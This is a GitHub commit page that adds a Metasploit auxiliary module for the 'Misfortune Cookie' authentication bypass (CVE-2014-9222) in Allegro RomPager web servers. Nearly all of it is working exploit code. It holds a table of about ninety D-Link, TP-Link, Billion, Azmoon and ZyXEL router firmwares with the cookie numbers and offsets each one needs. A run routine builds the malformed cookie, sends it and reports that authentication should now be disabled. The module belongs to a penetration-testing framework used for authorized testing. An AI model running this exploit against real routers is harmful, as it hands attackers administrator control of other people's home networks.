Skip to content

Commit b377cd8

Browse files
j91321j91321
committed
Allegrosoft rompager auth bypass auxiliary module
1 parent e0ff885 commit b377cd8

File tree

1 file changed

+293
-0
lines changed

1 file changed

+293
-0
lines changed

modules/auxiliary/admin/http/allegro_rompager_auth_bypass.rb

Lines changed: 293 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,293 @@
1+
##
2+
# This module requires Metasploit: http://metasploit.com/download
3+
# Current source: https://github.com/rapid7/metasploit-framework
4+
##
5+
6+
require 'msf/core'
7+
8+
class MetasploitModule < Msf::Auxiliary
9+
include Msf::Exploit::Remote::HttpClient
10+
include Msf::Auxiliary::Report
11+
12+
def initialize(info = {})
13+
super(update_info(
14+
info,
15+
'Name' => "Allegro Software RomPager 'Misfortune Cookie' (CVE-2014-9222) Authentication bypass",
16+
'Description' => %q(
17+
This module exploits HTTP servers that appear to be vulnerable to the
18+
'Misfortune Cookie' vulnerability which affects Allegro Software
19+
Rompager versions before 4.34 and can allow attackers to authenticate
20+
to the HTTP service as an administrator without providing valid
21+
credentials.
22+
),
23+
'Author' => [
24+
'Jon Hart <jon_hart[at]rapid7.com>', # metasploit scanner module
25+
'Jan Trencansky <jan.trencansky[at]gmail.com>', # metasploit auxiliary admin module
26+
'Lior Oppenheim' # CVE-2014-9222
27+
],
28+
'References' => [
29+
['CVE', '2014-9222'],
30+
['URL', 'http://mis.fortunecook.ie'],
31+
['URL', 'http://mis.fortunecook.ie/misfortune-cookie-suspected-vulnerable.pdf'], # list of likely vulnerable devices
32+
['URL', 'http://mis.fortunecook.ie/too-many-cooks-exploiting-tr069_tal-oppenheim_31c3.pdf'] # 31C3 presentation with POC
33+
],
34+
'DisclosureDate' => 'Dec 17 2014',
35+
'License' => MSF_LICENSE
36+
))
37+
38+
register_options(
39+
[
40+
OptString.new('TARGETURI', [true, 'URI to test', '/']),
41+
OptInt.new('device',[true, 'ID of device from list of vulnerable devices'])
42+
], Exploit::Remote::HttpClient
43+
)
44+
45+
register_advanced_options(
46+
[
47+
#OptString.new('COOKIE_NUMBER',[false, 'Value used in cookie e.g. 107373883']),
48+
#OptInt.new('COOKIE_OFFSET',[false, 'Value of offset in cookie']),
49+
OptString.new('CANARY_URI', [false, 'Try overwriting the requested URI with this canary value (empty for random)']),
50+
OptString.new('STATUS_CODES_REGEX', [true, 'Ensure that canary pages and probe responses have status codes that match this regex', '^40[134]$'])
51+
], self.class
52+
)
53+
end
54+
55+
def headers
56+
{
57+
'Referer' => full_uri
58+
}
59+
end
60+
61+
def devices_list
62+
[
63+
{:name=> 'Azmoon', :model=>'AZ-D140W', :fw=>'2.11.89.0(RE2.C29)3.11.11.52_PMOFF.1', :number=> 107367693,
64+
:offset=> 13}, # 0x803D5A79 # tested
65+
{:name=> 'Billion', :model=>'BiPAC 5102S', :fw=>'Av2.7.0.23 (UE0.B1C)', :number=> 107369694, :offset=> 13},
66+
# 0x8032204d # ----------
67+
{:name=> 'Billion', :model=>'BiPAC 5102S', :fw=>'Bv2.7.0.23 (UE0.B1C)', :number=> 107369694, :offset=> 13},
68+
# 0x8032204d # ----------
69+
{:name=> 'Billion', :model=>'BiPAC 5200', :fw=>'2.11.84.0(UE2.C2)3.11.11.6', :number=> 107369545,
70+
:offset=> 9}, # 0x803ec2ad # ----------
71+
{:name=> 'Billion', :model=>'BiPAC 5200', :fw=>'2_11_62_2_ UE0.C2D_3_10_16_0', :number=> 107371218,
72+
:offset=> 21}, # 0x803c53e5 # ----------
73+
{:name=> 'Billion', :model=>'BiPAC 5200A', :fw=>'2_10_5 _0(RE0.C2)3_6_0_0', :number=> 107366366,
74+
:offset=> 25}, # 0x8038a6e1 # ----------
75+
{:name=> 'Billion', :model=>'BiPAC 5200A', :fw=>'2_11_38_0 (RE0.C29)3_10_5_0', :number=> 107371453,
76+
:offset=> 9}, # 0x803b3a51 # ----------
77+
{:name=> 'Billion', :model=>'BiPAC 5200GR4', :fw=>'2.11.91.0(RE2.C29)3.11.11.52', :number=> 107367690,
78+
:offset=> 21}, # 0x803D8A51 # tested
79+
{:name=> 'Billion', :model=>'BiPAC 5200SRD', :fw=>'2.10.5.0 (UE0.C2C) 3.6.0.0', :number=> 107368270,
80+
:offset=> 1}, # 0x8034b109 # ----------
81+
{:name=> 'Billion', :model=>'BiPAC 5200SRD', :fw=>'2.12.17.0_UE2.C3_3.12.17.0', :number=> 107371378,
82+
:offset=> 37}, # 0x8040587d # ----------
83+
{:name=> 'Billion', :model=>'BiPAC 5200SRD', :fw=>'2_11_62_2(UE0.C3D)3_11_11_22', :number=> 107371218,
84+
:offset=> 13}, # 0x803c49d5 # ----------
85+
{:name=> 'D-Link', :model=>'DSL-2520U', :fw=>'Z1 1.08 DSL-2520U_RT63261_Middle_East_ADSL',
86+
:number=> 107368902, :offset=> 25}, # 0x803fea01 # tested
87+
{:name=> 'D-Link', :model=>'DSL-2600U', :fw=>'Z1_DSL-2600U', :number=> 107366496, :offset=> 13},
88+
# 0x8040637d # ----------
89+
{:name=> 'D-Link', :model=>'DSL-2600U', :fw=>'Z2_V1.08_ras', :number=> 107360133, :offset=> 20},
90+
# 0x803389B0 # ----------
91+
{:name=> 'TP-Link', :model=>'TD-8616', :fw=>'V2_080513', :number=> 107371483, :offset=> 21},
92+
# 0x80397055 # ----------
93+
{:name=> 'TP-Link', :model=>'TD-8816', :fw=>'V4_100528_Russia', :number=> 107369790, :offset=> 17},
94+
# 0x803ae0b1 # ----------
95+
{:name=> 'TP-Link', :model=>'TD-8816', :fw=>'V4_100524', :number=> 107369790, :offset=> 17},
96+
# 0x803ae0b1 # ----------
97+
{:name=> 'TP-Link', :model=>'TD-8816', :fw=>'V5_100528_Russia', :number=> 107369790, :offset=> 17},
98+
# 0x803ae0b1 # ----------
99+
{:name=> 'TP-Link', :model=>'TD-8816', :fw=>'V5_100524', :number=> 107369790, :offset=> 17},
100+
# 0x803ae0b1 # tested
101+
{:name=> 'TP-Link', :model=>'TD-8816', :fw=>'V5_100903', :number=> 107369790, :offset=> 17},
102+
# 0x803ae0b1 # ----------
103+
{:name=> 'TP-Link', :model=>'TD-8816', :fw=>'V6_100907', :number=> 107371426, :offset=> 17},
104+
# 0x803c6e09 # ----------
105+
{:name=> 'TP-Link', :model=>'TD-8816', :fw=>'V7_111103', :number=> 107371161, :offset=> 1},
106+
# 0x803e1bd5 # ----------
107+
{:name=> 'TP-Link', :model=>'TD-8816', :fw=>'V7_130204', :number=> 107370211, :offset=> 5},
108+
# 0x80400c85 # ----------
109+
{:name=> 'TP-Link', :model=>'TD-8817', :fw=>'V5_100524', :number=> 107369790, :offset=> 17},
110+
# 0x803ae0b1 # ----------
111+
{:name=> 'TP-Link', :model=>'TD-8817', :fw=>'V5_100702_TR', :number=> 107369790, :offset=> 17},
112+
# 0x803ae0b1 # ----------
113+
{:name=> 'TP-Link', :model=>'TD-8817', :fw=>'V5_100903', :number=> 107369790, :offset=> 17},
114+
# 0x803ae0b1 # ----------
115+
{:name=> 'TP-Link', :model=>'TD-8817', :fw=>'V6_100907', :number=> 107369788, :offset=> 1},
116+
# 0x803b6e09 # ----------
117+
{:name=> 'TP-Link', :model=>'TD-8817', :fw=>'V6_101221', :number=> 107369788, :offset=> 1},
118+
# 0x803b6e09 # ----------
119+
{:name=> 'TP-Link', :model=>'TD-8817', :fw=>'V7_110826', :number=> 107369522, :offset=> 25},
120+
# 0x803d1bd5 # ----------
121+
{:name=> 'TP-Link', :model=>'TD-8817', :fw=>'V7_130217', :number=> 107369316, :offset=> 21},
122+
# 0x80407625 # ----------
123+
{:name=> 'TP-Link', :model=>'TD-8817', :fw=>'V7_120509', :number=> 107369321, :offset=> 9},
124+
# 0x803fbcc5 # tested
125+
{:name=> 'TP-Link', :model=>'TD-8817', :fw=>'V8_140311', :number=> 107351277, :offset=> 20},
126+
# 0x8024E148 # tested
127+
{:name=> 'TP-Link', :model=>'TD-8820', :fw=>'V3_091223', :number=> 107369768, :offset=> 17},
128+
# 0x80397E69 # tested
129+
{:name=> 'TP-Link', :model=>'TD-8840T', :fw=>'V1_080520', :number=> 107369845, :offset=> 5},
130+
# 0x80387055 # ----------
131+
{:name=> 'TP-Link', :model=>'TD-8840T', :fw=>'V2_100525', :number=> 107369790, :offset=> 17},
132+
# 0x803ae0b1 # tested
133+
{:name=> 'TP-Link', :model=>'TD-8840T', :fw=>'V2_100702_TR', :number=> 107369790, :offset=> 17},
134+
# 0x803ae0b1 # ----------
135+
{:name=> 'TP-Link', :model=>'TD-8840T', :fw=>'V2_090609', :number=> 107369570, :offset=> 1},
136+
# 0x803c65d5 # ----------
137+
{:name=> 'TP-Link', :model=>'TD-8840T', :fw=>'V3_101208', :number=> 107369766, :offset=> 17},
138+
# 0x803c3e89 # tested
139+
{:name=> 'TP-Link', :model=>'TD-8840T', :fw=>'V3_110221', :number=> 107369764, :offset=> 5},
140+
# 0x803d1a09 # ----------
141+
{:name=> 'TP-Link', :model=>'TD-8840T', :fw=>'V3_120531', :number=> 107369688, :offset=> 17},
142+
# 0x803fed35 # ----------
143+
{:name=> 'TP-Link', :model=>'TD-W8101G', :fw=>'V1_090107', :number=> 107367772, :offset=> 37},
144+
# 0x803bf701 # ----------
145+
{:name=> 'TP-Link', :model=>'TD-W8101G', :fw=>'V1_090107', :number=> 107367808, :offset=> 21},
146+
# 0x803e5b6d # ----------
147+
{:name=> 'TP-Link', :model=>'TD-W8101G', :fw=>'V2_100819', :number=> 107367751, :offset=> 21},
148+
# 0x803dc701 # ----------
149+
{:name=> 'TP-Link', :model=>'TD-W8101G', :fw=>'V2_101015_TR', :number=> 107367749, :offset=> 13},
150+
# 0x803e1829 # ----------
151+
{:name=> 'TP-Link', :model=>'TD-W8101G', :fw=>'V2_101101', :number=> 107367749, :offset=> 13},
152+
# 0x803e1829 # ----------
153+
{:name=> 'TP-Link', :model=>'TD-W8101G', :fw=>'V3_110119', :number=> 107367765, :offset=> 25},
154+
# 0x804bb941 # ----------
155+
{:name=> 'TP-Link', :model=>'TD-W8101G', :fw=>'V3_120213', :number=> 107367052, :offset=> 25},
156+
# 0x804e1ff9 # ----------
157+
{:name=> 'TP-Link', :model=>'TD-W8101G', :fw=>'V3_120604', :number=> 107365835, :offset=> 1},
158+
# 0x804f16a9 # ----------
159+
{:name=> 'TP-Link', :model=>'TD-W8151N', :fw=>'V3_120530', :number=> 107353867, :offset=> 24},
160+
# 0x8034F3A4 # tested
161+
{:name=> 'TP-Link', :model=>'TD-W8901G', :fw=>'V1_080522', :number=> 107367787, :offset=> 21},
162+
# 0x803AB30D # tested
163+
{:name=> 'TP-Link', :model=>'TD-W8901G', :fw=>'V1,2_080522', :number=> 107368013, :offset=> 5},
164+
# 0x803AB30D # ----------
165+
{:name=> 'TP-Link', :model=>'TD-W8901G', :fw=>'V2_090113_Turkish', :number=> 107368013, :offset=> 5},
166+
# 0x803AB30D # ----------
167+
{:name=> 'TP-Link', :model=>'TD-W8901G', :fw=>'V3_140512', :number=> 107367854, :offset=> 9},
168+
# 0x803cf335 # tested
169+
{:name=> 'TP-Link', :model=>'TD-W8901G', :fw=>'V3_100603', :number=> 107367751, :offset=> 21},
170+
# 0x803DC701 # tested
171+
{:name=> 'TP-Link', :model=>'TD-W8901G', :fw=>'V3_100702_TR', :number=> 107367751, :offset=> 21},
172+
# 0x803DC701 # tested
173+
{:name=> 'TP-Link', :model=>'TD-W8901G', :fw=>'V3_100901', :number=> 107367749, :offset=> 13},
174+
# 0x803E1829 # tested
175+
{:name=> 'TP-Link', :model=>'TD-W8901G', :fw=>'V6_110119', :number=> 107367765, :offset=> 25},
176+
# 0x804BB941 # tested
177+
{:name=> 'TP-Link', :model=>'TD-W8901G', :fw=>'V6_110915', :number=> 107367682, :offset=> 21},
178+
# 0x804D7CB9 # tested
179+
{:name=> 'TP-Link', :model=>'TD-W8901G', :fw=>'V6_120418', :number=> 107365835, :offset=> 1},
180+
# 0x804F16A9 # ----------
181+
{:name=> 'TP-Link', :model=>'TD-W8901G', :fw=>'V6_120213', :number=> 107367052, :offset=> 25},
182+
# 0x804E1FF9 # ----------
183+
{:name=> 'TP-Link', :model=>'TD-W8901GB', :fw=>'V3_100727', :number=> 107367756, :offset=> 13},
184+
# 0x803dfbe9 # ----------
185+
{:name=> 'TP-Link', :model=>'TD-W8901GB', :fw=>'V3_100820', :number=> 107369393, :offset=> 21},
186+
# 0x803f1719 # ----------
187+
{:name=> 'TP-Link', :model=>'TD-W8901N', :fw=>'V1_111211', :number=> 107353880, :offset=> 0},
188+
# 0x8034FF94 # tested
189+
{:name=> 'TP-Link', :model=>'TD-W8951ND', :fw=>'V1_101124,100723,100728', :number=> 107369839, :offset=> 25},
190+
# 0x803d2d61 # tested
191+
{:name=> 'TP-Link', :model=>'TD-W8951ND', :fw=>'V1_110907', :number=> 107369876, :offset=> 13},
192+
# 0x803d6ef9 # ----------
193+
{:name=> 'TP-Link', :model=>'TD-W8951ND', :fw=>'V1_111125', :number=> 107369876, :offset=> 13},
194+
# 0x803d6ef9 # ----------
195+
{:name=> 'TP-Link', :model=>'TD-W8951ND', :fw=>'V3.0_110729_FI', :number=> 107366743, :offset=> 21},
196+
# 0x804ef189 # ----------
197+
{:name=> 'TP-Link', :model=>'TD-W8951ND', :fw=>'V3_110721', :number=> 107366743, :offset=> 21},
198+
# 0x804ee049 # ----------
199+
{:name=> 'TP-Link', :model=>'TD-W8951ND', :fw=>'V3_20110729_FI', :number=> 107366743, :offset=> 21},
200+
# 0x804ef189 # ----------
201+
{:name=> 'TP-Link', :model=>'TD-W8951ND', :fw=>'V4_120511', :number=> 107364759, :offset=> 25},
202+
# 0x80523979 # tested
203+
{:name=> 'TP-Link', :model=>'TD-W8951ND', :fw=>'V4_120607', :number=> 107364759, :offset=> 13},
204+
# 0x80524A91 # tested
205+
{:name=> 'TP-Link', :model=>'TD-W8951ND', :fw=>'V4_120912_FL', :number=> 107364760, :offset=> 21},
206+
# 0x80523859 # tested
207+
{:name=> 'TP-Link', :model=>'TD-W8961NB', :fw=>'V1_110107', :number=> 107369844, :offset=> 17},
208+
# 0x803de3f1 # tested
209+
{:name=> 'TP-Link', :model=>'TD-W8961NB', :fw=>'V1_110519', :number=> 107369844, :offset=> 17},
210+
# 0x803de3f1 # ----------
211+
{:name=> 'TP-Link', :model=>'TD-W8961NB', :fw=>'V2_120319', :number=> 107367629, :offset=> 21},
212+
# 0x80531859 # ----------
213+
{:name=> 'TP-Link', :model=>'TD-W8961NB', :fw=>'V2_120823', :number=> 107366421, :offset=> 13},
214+
# 0x80542e59 # ----------
215+
{:name=> 'TP-Link', :model=>'TD-W8961ND', :fw=>'V1_100722,101122', :number=> 107369839, :offset=> 25},
216+
# 0x803D2D61 # tested
217+
{:name=> 'TP-Link', :model=>'TD-W8961ND', :fw=>'V1_101022_TR', :number=> 107369839, :offset=> 25},
218+
# 0x803D2D61 # ----------
219+
{:name=> 'TP-Link', :model=>'TD-W8961ND', :fw=>'V1_111125', :number=> 107369876, :offset=> 13},
220+
# 0x803D6EF9 # ----------
221+
{:name=> 'TP-Link', :model=>'TD-W8961ND', :fw=>'V2_120427', :number=> 107364732, :offset=> 25},
222+
# 0x8052e0e9 # ----------
223+
{:name=> 'TP-Link', :model=>'TD-W8961ND', :fw=>'V2_120710_UK', :number=> 107364771, :offset=> 37},
224+
# 0x80523AA9 # ----------
225+
{:name=> 'TP-Link', :model=>'TD-W8961ND', :fw=>'V2_120723_FI', :number=> 107364762, :offset=> 29},
226+
# 0x8052B6B1 # ----------
227+
{:name=> 'TP-Link', :model=>'TD-W8961ND', :fw=>'V3_120524,120808', :number=> 107353880, :offset=> 0},
228+
# 0x803605B4 # ----------
229+
{:name=> 'TP-Link', :model=>'TD-W8961ND', :fw=>'V3_120830', :number=> 107353414, :offset=> 36},
230+
# 0x803605B4 # ----------
231+
{:name=> 'ZyXEL', :model=>'P-660R-T3', :fw=>'3.40(BOQ.0)C0', :number=> 107369567, :offset=> 21},
232+
# 0x803db071 # tested
233+
{:name=> 'ZyXEL', :model=>'P-660RU-T3', :fw=>'3.40(BJR.0)C0', :number=> 107369567, :offset=> 21}
234+
]
235+
end
236+
237+
def auxiliary_commands
238+
{ "devices" => "List known vulnerable devices" }
239+
end
240+
241+
def cmd_devices(*args)
242+
tbl = Msf::Ui::Console::Table.new(
243+
Msf::Ui::Console::Table::Style::Default,
244+
'Header' => "List of vulnerable devices",
245+
'Prefix' => "\n",
246+
'Postfix' => "\n",
247+
'Columns' =>
248+
[
249+
'ID',
250+
'Name',
251+
'Model',
252+
'Firmware',
253+
'Number',
254+
'Offset'
255+
])
256+
counter = 0
257+
for device in devices_list
258+
tbl << [counter, device[:name], device[:model], device[:fw], device[:number], device[:offset] ]
259+
counter += 1
260+
end
261+
print tbl.to_s
262+
#print_status("ID\tName")
263+
264+
#for device in devices_list
265+
# print_status(counter.to_s + ":\t" + device[:name])
266+
# counter += 1
267+
#end
268+
end
269+
270+
def run
271+
cookie = ''
272+
begin
273+
cookie_number = devices_list[datastore['DEVICE']][:number].to_s
274+
cookie_offset = devices_list[datastore['DEVICE']][:offset]
275+
cookie = 'C' + cookie_number + '=' + 'B' * cookie_offset + "\x00"
276+
rescue
277+
print_error('Device number is out of range, please run devices to see list of vulnerable devices')
278+
end
279+
print_status('Device name: ' + devices_list[datastore['DEVICE']][:name])
280+
print_status('Device model: ' + devices_list[datastore['DEVICE']][:model])
281+
print_status('Device firmware: ' + devices_list[datastore['DEVICE']][:fw])
282+
res = send_request_raw(
283+
'uri' => normalize_uri(target_uri.path.to_s),
284+
'method' => 'GET',
285+
'headers' => headers.merge('Cookie' => cookie)
286+
)
287+
if res != nil and res.code <= 302 # This may give wrong results if run against non rom-pager devices
288+
print_good('Exploit sent, please check host, authentication should be disabled')
289+
else
290+
print_error('Exploit failed')
291+
end
292+
end
293+
end

0 commit comments

Comments
 (0)